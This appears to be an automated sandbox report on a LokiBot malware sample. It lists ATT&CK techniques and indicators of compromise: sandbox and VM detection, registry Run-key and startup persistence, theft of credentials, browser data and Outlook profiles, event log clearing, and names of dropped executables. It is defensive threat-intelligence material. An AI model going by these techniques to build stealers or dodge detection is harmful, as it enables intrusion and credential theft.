lokibot | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	UqhRb9F.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found

Blocklisted process makes network request 3 IoCs

flow	pid	Process
233	111352	Process not Found
235	114860	Process not Found
237	117472	Process not Found

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
111400	Process not Found
111352	Process not Found
117472	Process not Found
2108	powershell.exe
4656	powershell.exe
2724	powershell.exe
119444	Process not Found
196956	Process not Found
208840	Process not Found
8876	Process not Found
20936	Process not Found

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Indicator Removal: Network Share Connection Removal 1 TTPs 7 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
8708	Process not Found
10364	Process not Found
11052	Process not Found
12940	Process not Found
22680	Process not Found
22636	Process not Found
24956	Process not Found

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	UqhRb9F.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	UqhRb9F.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url	Process not Found
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk	Process not Found
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk	Process not Found
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk	Process not Found
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url	Process not Found

Executes dropped EXE 64 IoCs

pid	Process
3592	UqhRb9F.exe
3716	fHR9z2C.exe
1440	filer.exe
3804	AmLzNi.exe
2752	Xworm%20V5.6.exe
4948	XClient.exe
4256	333.exe
240	VBVEd6f.exe
736	test12.exe
3144	test6.exe
4876	test14.exe
1720	pantest.exe
4848	test9.exe
5016	test10-29.exe
3916	test19.exe
3392	test10.exe
4996	test_again4.exe
3424	test23.exe
484	test5.exe
4552	test11.exe
4108	test20.exe
3588	test_again3.exe
2168	test16.exe
3616	test13.exe
3000	test_again2.exe
4872	test15.exe
4992	test18.exe
4780	test21.exe
2112	test22.exe
5032	test8.exe
648	test7.exe
2992	test-again.exe
4228	test17.exe
1648	vg9qcBa.exe
2392	vg9qcBa.exe
1780	win.exe
1416	x4lburt.exe
1528	computerlead.exe
4420	9758xBqgE1azKnB.exe
3732	7mpPLxE.exe
3632	7mpPLxE.exe
3156	7mpPLxE.exe
688	7mpPLxE.exe
536	7mpPLxE.exe
2944	7mpPLxE.exe
1988	7mpPLxE.exe
540	7mpPLxE.exe
4068	7mpPLxE.exe
3288	7mpPLxE.exe
1476	7mpPLxE.exe
1776	7mpPLxE.exe
4864	7mpPLxE.exe
2692	7mpPLxE.exe
2364	7mpPLxE.exe
5100	7mpPLxE.exe
2332	7mpPLxE.exe
4800	7mpPLxE.exe
3536	7mpPLxE.exe
1540	7mpPLxE.exe
1520	7mpPLxE.exe
3408	7mpPLxE.exe
3744	7mpPLxE.exe
1528	7mpPLxE.exe
3108	7mpPLxE.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Wine	UqhRb9F.exe
Key opened	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Wine	Process not Found

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe

Loads dropped DLL 15 IoCs

pid	Process
155868	Process not Found
155868	Process not Found
155868	Process not Found
155868	Process not Found
155868	Process not Found
155868	Process not Found
155868	Process not Found
155868	Process not Found
155868	Process not Found
155868	Process not Found
155868	Process not Found
25876	Process not Found
26284	Process not Found
155868	Process not Found
155868	Process not Found

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Process not Found

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Run\9758xBqgE1azKnB = "C:\\Users\\Admin\\AppData\\Roaming\\9758xBqgE1azKnB.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe"	win.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	x4lburt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"	Process not Found

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\E:	Process not Found

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Network Service Discovery 1 TTPs 3 IoCs

Attempt to gather information on host's network.

Network Service Discovery

T1046

pid	Process
3044	arp.exe
8836	Process not Found
9748	Process not Found

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
197036	Process not Found
197964	Process not Found
197980	Process not Found
197864	Process not Found
198764	Process not Found
199472	Process not Found
198932	Process not Found
199820	Process not Found

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x001c00000002aac5-142.dat	autoit_exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Updates\grjujyNaBLaKbU	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	Process not Found
File opened for modification	C:\Windows\System32\Tasks\UAC	svchost.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

persistence privilege_escalation

Process Discovery

T1057

pid	Process
38828	Process not Found
42552	Process not Found

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
3592	UqhRb9F.exe
109176	Process not Found
199924	Process not Found
19416	Process not Found

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 1648 set thread context of 2392	1648	vg9qcBa.exe	182
PID 1528 set thread context of 3428	1528	computerlead.exe	191
PID 46644 set thread context of 74136	46644	Process not Found	8876
PID 74136 set thread context of 98860	74136	Process not Found	11962
PID 192412 set thread context of 198064	192412	Process not Found	24396
PID 4420 set thread context of 209280	4420	9758xBqgE1azKnB.exe	25717
PID 7592 set thread context of 8884	7592	Process not Found	32787
PID 19512 set thread context of 20944	19512	Process not Found	32977

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\IdeasApp	0fVlNye.exe
File opened for modification	C:\Windows\CentralAvoiding	0fVlNye.exe
File opened for modification	C:\Windows\UruguayNorthern	0fVlNye.exe
File opened for modification	C:\Windows\TeddySecretariat	0fVlNye.exe
File opened for modification	C:\Windows\VatBukkake	0fVlNye.exe
File created	C:\Windows\Tasks\UAC.job	Process not Found
File opened for modification	C:\Windows\DownReceptor	0fVlNye.exe
File opened for modification	C:\Windows\ComfortSick	0fVlNye.exe
File opened for modification	C:\Windows\JoiningMazda	0fVlNye.exe
File opened for modification	C:\Windows\MozambiqueAppropriate	0fVlNye.exe
File opened for modification	C:\Windows\OrganDiscretion	0fVlNye.exe
File opened for modification	C:\Windows\KeyboardsTwin	0fVlNye.exe

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
198584	Process not Found
200044	Process not Found
200008	Process not Found
197816	Process not Found
198036	Process not Found
197900	Process not Found
199656	Process not Found
198184	Process not Found
198392	Process not Found

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x000c000000000669-2290.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
4888	3428	WerFault.exe	191
111248	109176	Process not Found	13240
266180	3732	Process not Found	199

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9758xBqgE1azKnB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VBVEd6f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	win.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	route.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 42 IoCs

Adversaries may check for Internet connectivity on compromised systems.

Internet Connection Discovery

T1016.001

pid	Process
14424	Process not Found
16436	Process not Found
19556	Process not Found
20164	Process not Found
20848	Process not Found
13984	Process not Found
14448	Process not Found
14552	Process not Found
26576	Process not Found
15268	Process not Found
17524	Process not Found
23060	Process not Found
17804	Process not Found
20248	Process not Found
25000	Process not Found
18000	Process not Found
18548	Process not Found
12956	Process not Found
14820	Process not Found
17188	Process not Found
16268	Process not Found
16448	Process not Found
17896	Process not Found
18612	Process not Found
18692	Process not Found
10372	Process not Found
15488	Process not Found
15592	Process not Found
16168	Process not Found
17620	Process not Found
19344	Process not Found
20784	Process not Found
22764	Process not Found
14656	Process not Found
17704	Process not Found
20312	Process not Found
18484	Process not Found
19072	Process not Found
21224	Process not Found
11076	Process not Found
15388	Process not Found
16368	Process not Found

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0002000000025ccb-482.dat	nsis_installer_2
behavioral2/files/0x0004000000025cd9-1575.dat	nsis_installer_1
behavioral2/files/0x0004000000025cd9-1575.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Process not Found

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
1544	wmic.exe

Discovers systems in the same network 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
8844	Process not Found
9844	Process not Found
21408	Process not Found

Enumerates system info in registry 2 TTPs 50 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	Process not Found

Kills process with taskkill 2 IoCs

evasion

pid	Process
103748	Process not Found
156440	Process not Found

Modifies data under HKEY_USERS 27 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1\WpadDecisionReason = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1\WpadDecision = "0"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1\WpadDecisionTime = 4845b46c5f40db01	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1\WpadDecisionTime = e7a67bf95e40db01	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1\WpadDecisionTime = 20b1f0585f40db01	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1\WpadDecisionTime = 13dd9ba65f40db01	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1\WpadDecisionTime = 1861471f5f40db01	svchost.exe
